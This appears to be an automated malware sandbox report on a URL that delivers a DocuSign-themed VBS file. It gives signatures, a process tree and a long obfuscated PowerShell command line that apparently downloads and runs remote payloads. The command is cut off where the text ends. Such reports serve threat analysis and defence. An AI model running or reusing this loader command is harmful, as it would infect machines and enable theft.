Analysis

  • max time kernel
    145s
  • max time network
    203s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 12:07

General

  • Target

    https://glennmedina.com/eu.php

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://glennmedina.com/eu.php
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1116
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa04a746f8,0x7ffa04a74708,0x7ffa04a74718
      2⤵
        PID:2800
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2128 /prefetch:2
        2⤵
          PID:4284
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3640
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2808 /prefetch:8
          2⤵
            PID:2676
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
            2⤵
              PID:3060
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
              2⤵
                PID:5056
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
                2⤵
                  PID:3852
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1348
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
                  2⤵
                    PID:2308
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
                    2⤵
                      PID:4824
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5032 /prefetch:8
                      2⤵
                        PID:1248
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
                        2⤵
                          PID:4384
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1836
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:1
                          2⤵
                            PID:2352
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
                            2⤵
                              PID:3144
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,18044966484300374344,2586530418430388256,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3124 /prefetch:2
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:828
                          • C:\Windows\System32\CompPkgSrv.exe
                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                            1⤵
                              PID:3768
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:4480
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:2160
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\DocuSign01210021100\DocuSign01210021100.vbs"
                                  1⤵
                                  • Checks computer location settings
                                  PID:2268
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nnqvs = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIAApACcAMQ' + [char]66 + 'zAHAALgAzADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAA7ACcAOwApACAAKQAgACAAJwAnAG0Acw' + [char]66 + '' + [char]66 + 'AGcAZQ' + [char]66 + 'SAEQARAAgAEQAJwAnACAAIAAsACAATQ' + [char]66 + 'vAHcATg' + [char]66 + 'zACQAIAAsACAAJwAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'jAG8Abg' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAbg' + [char]66 + 'jAGEAbg' + [char]66 + 'jAHUAbgAuAGMAbw' + [char]66 + 'tAC8AYgAuAHQAeA' + [char]66 + '0ACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAnACAAPQArACAAZw' + [char]66 + 'SAEQATw' + [char]66 + 'NACQAOwAgACcAOwAgACkAIAApACcAJw' + [char]66 + '' + [char]66 + 'ACcAJwAsACcAJwCTIToAkyEnACcAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'yAC4ARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'zAFsAIAA9ACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAJwAgAD0AKwAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIAAnADsAKQA4AEYAVA' + [char]66 + 'VACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIAAnACAAKwAgAGwARw' + [char]66 + 'mAFQAUwAkACAAKwAgACcAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAKAAgAD0AIA' + [char]66 + 'HAGUAYQ' + [char]66 + '5AHIAJAAgADsAIAAnACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACcAIAA9ACAATQ' + [char]66 + 'vAHcATg' + [char]66 + 'zACQAJwAgACAAPQAgAGcAUg' + [char]66 + 'EAE8ATQAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAGwARw' + [char]66 + 'mAFQAUwAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAAeg' + [char]66 + 'IAGwAVA' + [char]66 + '1ACQAOwAgACkAIA' + [char]66 + '' + [char]66 + 'AFUAeg' + [char]66 + 'IAEQAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAIAA9ACAAeg' + [char]66 + 'IAGwAVA' + [char]66 + '1ACQAOwAgACkAIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAIA' + [char]66 + '' + [char]66 + 'AFUAeg' + [char]66 + 'IAEQAJAA7ACAAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + 'OAGwAcg' + [char]66 + 'oAFAAJAA7ACAAKQAnAHQAeA' + [char]66 + '0AC4AMgAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAbA' + [char]66 + 'HAGYAVA' + [char]66 + 'TACQAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAJwA4AEYAVA' + [char]66 + 'VACcAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgAFEARw' + [char]66 + 'wAGUASQAkACAAaA' + [char]66 + '0AGEAUA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAC0AdA' + [char]66 + '1AE8AIA' + [char]66 + '8ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAIA' + [char]66 + 'iAGsAdA' + [char]66 + 'kAHEAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAAgAD0AIA' + [char]66 + '2AFgAVQ' + [char]66 + 'WAFIAJAA7ACAAKQ' + [char]66 + 'xAEcAbA' + [char]66 + 'sAGwAJAAgACwAUA' + [char]66 + 'SAHIAag' + [char]66 + 'PACQAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAGsAcg' + [char]66 + 'vAHcAdA' + [char]66 + 'lAE4ALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8ALQ' + [char]66 + '3AGUAbgAgAD0AIA' + [char]66 + 'zAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALg' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACAAPQAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAOwAgACkAKQAgADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADYANQAgACwANQA1ACAALAAzADUAIAAsADkANAAgACwAOQA4ACAALAAwADAAMQAgACwANwAxADEAIAAsADkAOAAgACwAMgAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAgAD0AIA' + [char]66 + 'xAEcAbA' + [char]66 + 'sAGwAJAA7ACAAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAUA' + [char]66 + 'SAHIAag' + [char]66 + 'PACQAOwApACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'RAEcAcA' + [char]66 + 'lAEkAJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8AJwAgACsAIAAnAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAoACAAPQAgAGIAaw' + [char]66 + '0AGQAcQAkADsAfQAgAAoADQA7AHQAaQ' + [char]66 + '4AGUAIAAgACAAIAAgACAACgANADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgAHIAZQ' + [char]66 + '0AHUAcA' + [char]66 + 'tAG8AQwAtAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAFIACgANACAAew' + [char]66 + 'lAHMAbA' + [char]66 + 'lAAoADQAKAA0AfQAKAA0AIAAgACAAIAAgACAAIAAKAA0AIA' + [char]66 + '7ACkAbA' + [char]66 + 'sAHUATgAkACAAcQ' + [char]66 + 'lAC0AIAApAGUAdQ' + [char]66 + 'uAGkAdA' + [char]66 + 'uAG8AQw' + [char]66 + '5AGwAdA' + [char]66 + 'uAGUAbA' + [char]66 + 'pAFMAIA' + [char]66 + 'hAGUALQAgACcAZQ' + [char]66 + '6AHkAbA' + [char]66 + 'hAG4AYQAnACwAJw' + [char]66 + 'TAE4ARA' + [char]66 + 'lAHQAYQ' + [char]66 + 'wAGEAJwAsACcAaw' + [char]66 + 'yAGEAaA' + [char]66 + 'zAGUAcg' + [char]66 + 'pAFcAJwAgAHMAcw' + [char]66 + 'lAGMAbw' + [char]66 + 'yAHAALQ' + [char]66 + '0AGUAZwAoACgAZg' + [char]66 + 'pADsAIAAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACAAfQ' + [char]66 + 'lAHUAcg' + [char]66 + '0ACQAewAgAD0AIA' + [char]66 + 'rAGMAYQ' + [char]66 + 'iAGwAbA' + [char]66 + 'hAEMAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAGQAaQ' + [char]66 + 'sAGEAVg' + [char]66 + 'lAHQAYQ' + [char]66 + 'jAGkAZg' + [char]66 + 'pAHQAcg' + [char]66 + 'lAEMAcg' + [char]66 + 'lAHYAcg' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWw' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ACAAZgAvACAAMAAgAHQALwAgAHIALwAgAGUAeA' + [char]66 + 'lAC4Abg' + [char]66 + '3AG8AZA' + [char]66 + '0AHUAaA' + [char]66 + 'zACAAOwAnADAAOAAxACAAcA' + [char]66 + 'lAGUAbA' + [char]66 + 'zACcAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAKQAgACcAcA' + [char]66 + '1AHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAbQ' + [char]66 + 'hAHIAZw' + [char]66 + 'vAHIAUA' + [char]66 + 'cAHUAbg' + [char]66 + 'lAE0AIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAHcAbw' + [char]66 + 'kAG4AaQ' + [char]66 + 'XAFwAdA' + [char]66 + 'mAG8Acw' + [char]66 + 'vAHIAYw' + [char]66 + 'pAE0AXA' + [char]66 + 'nAG4AaQ' + [char]66 + 'tAGEAbw' + [char]66 + 'SAFwAYQ' + [char]66 + '0AGEARA' + [char]66 + 'wAHAAQQ' + [char]66 + 'cACcAIAArACAARg' + [char]66 + 'rAFcAcA' + [char]66 + '0ACQAIAAoACAAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAG4AaQ' + [char]66 + '0AHMAZQ' + [char]66 + 'EAC0AIAAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAG0AZQ' + [char]66 + '0AEkALQ' + [char]66 + '5AHAAbw' + [char]66 + 'DACAAOwAgAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAHIAbw' + [char]66 + 'uAC8AIA' + [char]66 + '0AGUAaQ' + [char]66 + '1AHEALwAgAEIASA' + [char]66 + 'YAGgASAAgAGUAeA' + [char]66 + 'lAC4AYQ' + [char]66 + 'zAHUAdwAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAAgADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJAAoACAAPQAgAEIASA' + [char]66 + 'YAGgASAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACgAIAA9ACAARg' + [char]66 + 'rAFcAcA' + [char]66 + 